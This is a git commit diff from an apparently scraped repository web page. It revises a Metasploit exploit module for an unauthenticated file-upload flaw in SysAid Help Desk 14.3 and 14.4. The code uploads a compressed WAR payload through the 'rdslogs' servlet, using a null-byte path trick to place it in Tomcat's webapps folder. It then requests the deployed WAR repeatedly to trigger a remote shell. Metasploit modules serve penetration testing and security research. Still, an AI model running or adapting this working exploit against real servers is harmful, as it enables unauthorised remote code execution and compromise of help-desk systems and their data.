Fix paths for windows and cleanup
parent
ea49fd2fdc
commit
57c4a3387b
|
@ -14,7 +14,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'SysAid Help Desk rdslogs Arbitrary File Upload',
|
||||
'Name' => 'SysAid Help Desk 'rdslogs' Arbitrary File Upload',
|
||||
'Description' => %q{
|
||||
This module exploits a file upload vulnerability in SysAid Help Desk v14.3 and v14.4.
|
||||
The vulnerability exists in the RdsLogsEntry servlet which accepts unauthenticated
|
||||
|
@ -62,6 +62,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
def check
|
||||
servlet_path = 'rdslogs'
|
||||
bogus_file = rand_text_alphanumeric(4 + rand(32 - 4))
|
||||
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri(datastore['TARGETURI'], servlet_path),
|
||||
'method' => 'POST',
|
||||
|
@ -69,7 +70,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'rdsName' => bogus_file
|
||||
}
|
||||
})
|
||||
if res and res.code == 200
|
||||
|
||||
if res && res.code == 200
|
||||
return Exploit::CheckCode::Detected
|
||||
end
|
||||
end
|
||||
|
@ -103,24 +105,31 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'data' => Zlib::Deflate.deflate(war_payload),
|
||||
'ctype' => 'application/octet-stream',
|
||||
'vars_get' => {
|
||||
'rdsName' => tomcat_path + app_base + ".war" + "\x00"
|
||||
'rdsName' => "#{tomcat_path}/tomcat/webapps/#{app_base}.war\x00"
|
||||
}
|
||||
})
|
||||
|
||||
# The server either returns a 200 OK when the upload is successful.
|
||||
if res and (res.code == 200)
|
||||
print_status("#{peer} - Upload appears to have been successful, waiting " + datastore['SLEEP'].to_s +
|
||||
" seconds for deployment")
|
||||
register_files_for_cleanup("webapps/" + app_base + ".war")
|
||||
sleep(datastore['SLEEP'])
|
||||
if res && res.code == 200
|
||||
print_status("#{peer} - Upload appears to have been successful, waiting #{datastore['SLEEP']} seconds for deployment")
|
||||
register_files_for_cleanup("tomcat/webapps/#{app_base}.war")
|
||||
else
|
||||
fail_with(Exploit::Failure::Unknown, "#{peer} - WAR upload failed")
|
||||
fail_with(Failure::Unknown, "#{peer} - WAR upload failed")
|
||||
end
|
||||
|
||||
print_status("#{peer} - Executing payload, wait for session...")
|
||||
send_request_cgi({
|
||||
'uri' => normalize_uri(app_base, Rex::Text.rand_text_alpha(rand(8)+8)),
|
||||
'method' => 'GET'
|
||||
})
|
||||
10.times do
|
||||
select(nil, nil, nil, 2)
|
||||
|
||||
# Now make a request to trigger the newly deployed war
|
||||
print_status("#{peer} - Attempting to launch payload in deployed WAR...")
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri(app_base, Rex::Text.rand_text_alpha(rand(8)+8)),
|
||||
'method' => 'GET'
|
||||
})
|
||||
# Failure. The request timed out or the server went away.
|
||||
break if res.nil?
|
||||
# Success! Triggered the payload, should have a shell incoming
|
||||
break if res.code == 200
|
||||
end
|
||||
end
|
||||
end
|
||||
|
|
Loading…
Reference in New Issue